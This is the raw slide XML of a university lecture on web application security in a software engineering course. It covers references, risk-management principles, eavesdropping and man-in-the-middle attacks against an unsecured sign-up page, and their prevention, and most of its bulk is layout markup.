              <a:tabLst>
                <a:tab pos="185364" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.owasp.org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5"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="185364" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.us-cert.gov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15"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="185364" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2399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ahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://searchsecurity.techtarget.com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dirty="0"/>
              <a:pPr marL="38089" defTabSz="914126">
                <a:lnSpc>
                  <a:spcPts val="955"/>
                </a:lnSpc>
              </a:pPr>
              <a:t>169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7881160">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="540"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t>References </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Books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267122"/>
            <a:ext cx="9151141" cy="887499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Introduction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Computer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Security,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="23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Matt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Bishop, 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Addison-Wesley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Coding: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Principles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Practices,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Mark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Graff,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et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al,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-9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O'Reilley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 the Data</a:t>
            </a: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1293813" y="1676399"/>
            <a:ext cx="10149250" cy="4906497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3838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6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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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3200" dirty="0"/>
              <a:t>Everyone</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> has responsibilities for the reputation of the company, duties to shareholders, and stakeholders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Embrace the value of risk management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The data is the heart of an organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Take steps to protect the data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125080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2412" y="1"/>
            <a:ext cx="9144000" cy="532447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2412" y="1296989"/>
            <a:ext cx="9144000" cy="29305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15" name="TextBox 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1885950" y="5591175"/>
            <a:ext cx="78853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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFCC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security: Attacks &amp; Countermeasures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9761537" y="3198813"/>
            <a:ext cx="1595438" cy="277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charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13317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799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1865312" y="1476375"/>
            <a:ext cx="1877786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4" r="53416"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3743099" y="1476375"/>
            <a:ext cx="2066307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07" r="27279"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5809406" y="1476375"/>
            <a:ext cx="2208811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75"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8015063" y="1476375"/>
            <a:ext cx="231123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97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1979612" y="0"/>
            <a:ext cx="8229600" cy="935038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SWEBOK KAs covered so far</a:t>
            </a:r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>
          <a:xfrm>
            <a:off x="1979612" y="935039"/>
            <a:ext cx="8229600" cy="5678487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Requirements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Design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Construction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Testing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Maintenance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Configuration Management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Management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Process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Models and Methods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Quality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Professional Practice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Economics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Computing Foundations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Mathematical Foundations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Engineering Foundations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522412" y="3927476"/>
            <a:ext cx="9144000" cy="2519363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912937" y="1350964"/>
            <a:ext cx="2497138" cy="344487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912938" y="1711326"/>
            <a:ext cx="3128963" cy="346075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912938" y="2808289"/>
            <a:ext cx="4595813" cy="344487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912938" y="2074864"/>
            <a:ext cx="2549525" cy="346075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1900237" y="990600"/>
            <a:ext cx="3263900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF00FF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912937" y="3524250"/>
            <a:ext cx="3816350" cy="344488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962150" y="1514476"/>
            <a:ext cx="8280400" cy="4189413"/>
            <a:chOff x="439738" y="1513690"/>
            <a:chExt cx="8279933" cy="4190424"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14347" name="TextBox 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6059702" y="2726649"/>
              <a:ext cx="2659969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>
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Today’s topic: Security</a:t>
              </a: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439738" y="5361131"/>
              <a:ext cx="3201806" cy="342983"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="57150" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF0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" name="Freeform 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2966895" y="1513690"/>
              <a:ext cx="4435225" cy="1316356"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 4435929 w 4435929"/>
                <a:gd name="connsiteY0" fmla="*/ 1316595 h 1316595"/>
                <a:gd name="connsiteX1" fmla="*/ 3020786 w 4435929"/>
                <a:gd name="connsiteY1" fmla="*/ 191738 h 1316595"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 4435929"/>
                <a:gd name="connsiteY2" fmla="*/ 1238 h 131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5929" h="1316595">
                  <a:moveTo>
                    <a:pt x="4435929" y="1316595"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4098018" y="863779"/>
                    <a:pt x="3760107" y="410964"/>
                    <a:pt x="3020786" y="191738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2281465" y="-27488"/>
                    <a:pt x="0" y="1238"/>
                    <a:pt x="0" y="1238"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="57150" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00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 flipV="1">
              <a:off x="3709804" y="3619223"/>
              <a:ext cx="3692317" cy="1895932"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 4435929 w 4435929"/>
                <a:gd name="connsiteY0" fmla="*/ 1316595 h 1316595"/>
                <a:gd name="connsiteX1" fmla="*/ 3020786 w 4435929"/>
                <a:gd name="connsiteY1" fmla="*/ 191738 h 1316595"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 4435929"/>
                <a:gd name="connsiteY2" fmla="*/ 1238 h 131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5929" h="1316595">
                  <a:moveTo>
                    <a:pt x="4435929" y="1316595"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4098018" y="863779"/>
                    <a:pt x="3760107" y="410964"/>
                    <a:pt x="3020786" y="191738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2281465" y="-27488"/>
                    <a:pt x="0" y="1238"/>
                    <a:pt x="0" y="1238"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="57150" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FF00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7" name="Rounded Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1912938" y="3165476"/>
            <a:ext cx="4413250" cy="344487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1C2A2D3-741C-1D45-9D26-C7DCAEEA614E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1912938" y="2435638"/>
            <a:ext cx="3128963" cy="346075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Three Common Web App Attacks and Countermeasures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910012" y="2401889"/>
            <a:ext cx="43688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>
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I’ll unfold them one by one…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6450012" y="417513"/>
            <a:ext cx="3843338" cy="1143000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What potential attack happens here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16386" name="Group 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2157413" y="617539"/>
            <a:ext cx="7821613" cy="5729287"/>
            <a:chOff x="0" y="262777"/>
            <a:chExt cx="5943600" cy="6678938"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2188287" y="4156511"/>
              <a:ext cx="1160492" cy="601456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144859" y="4091738"/>
              <a:ext cx="1160492" cy="601457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1223" y="262777"/>
              <a:ext cx="1160492" cy="601456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0" y="3716060"/>
              <a:ext cx="4696252" cy="3225655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1583" y="4026967"/>
              <a:ext cx="1161698" cy="603307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102638" y="4026967"/>
              <a:ext cx="1160492" cy="603307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Can 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013517" y="5762862"/>
              <a:ext cx="930083" cy="732851"/>
            </a:xfrm>
            <a:prstGeom prst="can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Cloud 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301583" y="1554520"/>
              <a:ext cx="2704597" cy="1511968"/>
            </a:xfrm>
            <a:prstGeom prst="cloud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" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="8" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="881829" y="864233"/>
              <a:ext cx="408946" cy="3162734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9" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2003718" y="864233"/>
              <a:ext cx="679165" cy="3162734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3"/>
              <a:endCxn id="9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463282" y="4328620"/>
              <a:ext cx="639356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1615279" y="4757967"/>
              <a:ext cx="573007" cy="10715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2003718" y="4757967"/>
              <a:ext cx="447549" cy="10715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902436" y="4757967"/>
              <a:ext cx="579040" cy="10715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3263129" y="4757967"/>
              <a:ext cx="591103" cy="105856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1376426" y="5957178"/>
              <a:ext cx="1160492" cy="6014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32998" y="5892406"/>
              <a:ext cx="1160492" cy="6033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290776" y="5829484"/>
              <a:ext cx="1160492" cy="60145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120782" y="5940523"/>
              <a:ext cx="1160492" cy="603307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77354" y="5877601"/>
              <a:ext cx="1160492" cy="601456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31514" y="5816529"/>
              <a:ext cx="1160492" cy="603307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4281274" y="6014548"/>
              <a:ext cx="732243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4301781" y="6273637"/>
              <a:ext cx="711736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11" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1351798" y="1839414"/>
              <a:ext cx="718151" cy="753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Ye Olde</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="1800">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16412" name="TextBox 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1265192" y="326429"/>
              <a:ext cx="726043" cy="43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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16413" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="394758" y="4045653"/>
              <a:ext cx="989936" cy="43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Rails Router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16414" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2256313" y="4074676"/>
              <a:ext cx="855798" cy="43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Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16415" name="TextBox 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1621956" y="5857623"/>
              <a:ext cx="492703" cy="43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View</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16416" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3345857" y="5835323"/>
              <a:ext cx="603210" cy="43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Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16417" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5296316" y="5932871"/>
              <a:ext cx="343751" cy="43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DB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6262687" y="2286000"/>
            <a:ext cx="965200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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450012" y="417513"/>
            <a:ext cx="3843338" cy="1143000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What potential attack happens here?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17410" name="Group 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2157413" y="617539"/>
            <a:ext cx="7821613" cy="5729287"/>
            <a:chOff x="0" y="262777"/>
            <a:chExt cx="5943600" cy="6678938"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2188287" y="4156511"/>
              <a:ext cx="1160492" cy="601456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144859" y="4091738"/>
              <a:ext cx="1160492" cy="601457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1223" y="262777"/>
              <a:ext cx="1160492" cy="601456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0" y="3716060"/>
              <a:ext cx="4696252" cy="3225655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1583" y="4026967"/>
              <a:ext cx="1161698" cy="603307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102638" y="4026967"/>
              <a:ext cx="1160492" cy="603307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Can 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013517" y="5762862"/>
              <a:ext cx="930083" cy="732851"/>
            </a:xfrm>
            <a:prstGeom prst="can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Cloud 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="301583" y="1554520"/>
              <a:ext cx="2704597" cy="1511968"/>
            </a:xfrm>
            <a:prstGeom prst="cloud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" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="8" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="881829" y="864233"/>
              <a:ext cx="408946" cy="3162734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9" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="2003718" y="864233"/>
              <a:ext cx="679165" cy="3162734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3"/>
              <a:endCxn id="9" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1463282" y="4328620"/>
              <a:ext cx="639356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1615279" y="4757967"/>
              <a:ext cx="573007" cy="10715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2003718" y="4757967"/>
              <a:ext cx="447549" cy="10715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902436" y="4757967"/>
              <a:ext cx="579040" cy="10715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3263129" y="4757967"/>
              <a:ext cx="591103" cy="105856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1376426" y="5957178"/>
              <a:ext cx="1160492" cy="6014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32998" y="5892406"/>
              <a:ext cx="1160492" cy="6033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290776" y="5829484"/>
              <a:ext cx="1160492" cy="60145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120782" y="5940523"/>
              <a:ext cx="1160492" cy="603307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77354" y="5877601"/>
              <a:ext cx="1160492" cy="601456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31514" y="5816529"/>
              <a:ext cx="1160492" cy="603307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4281274" y="6014548"/>
              <a:ext cx="732243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4301781" y="6273637"/>
              <a:ext cx="711736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436" name="TextBox 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1351798" y="1839414"/>
              <a:ext cx="718151" cy="753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Ye Olde</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="1800">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1800">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Internet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17437" name="TextBox 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1265192" y="326429"/>
              <a:ext cx="726043" cy="43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Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17438" name="TextBox 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="394758" y="4045653"/>
              <a:ext cx="989936" cy="43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Rails Router</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17439" name="TextBox 29"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2256313" y="4074676"/>
              <a:ext cx="855798" cy="43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Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17440" name="TextBox 30"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1621956" y="5857623"/>
              <a:ext cx="492703" cy="43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View</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17441" name="TextBox 31"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3345857" y="5835323"/>
              <a:ext cx="603210" cy="43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Model</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17442" name="TextBox 32"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5296316" y="5932871"/>
              <a:ext cx="343751" cy="43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DB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6262687" y="2286000"/>
            <a:ext cx="965200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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7000875" y="1763713"/>
            <a:ext cx="3048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>
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eavesdropping, packet sniffing,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>
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>man-in-the-middle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1979612" y="1"/>
            <a:ext cx="8229600" cy="842963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Example: Unsecured Sign-Up Page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1843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608013"/>
            <a:ext cx="88026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3095626" y="3067051"/>
            <a:ext cx="3278187" cy="2143125"/>
            <a:chOff x="1573561" y="3066585"/>
            <a:chExt cx="3277219" cy="2143513"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18436" name="TextBox 1"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2248829" y="3698489"/>
              <a:ext cx="260195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2400">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Trivial for packet sniffer to steal</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Right Brace 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1573561" y="3066585"/>
              <a:ext cx="917304" cy="2143513"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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6450012" y="417513"/>
            <a:ext cx="3843338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How to prevent?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19458" name="Group 2"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2157413" y="617539"/>
            <a:ext cx="7821613" cy="5729287"/>
            <a:chOff x="0" y="262777"/>
            <a:chExt cx="5943600" cy="6678938"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2188287" y="4156511"/>
              <a:ext cx="1160492" cy="601456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144859" y="4091738"/>
              <a:ext cx="1160492" cy="601457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1223" y="262777"/>
              <a:ext cx="1160492" cy="601456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0" y="3716060"/>
              <a:ext cx="4696252" cy="3225655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1583" y="4026967"/>
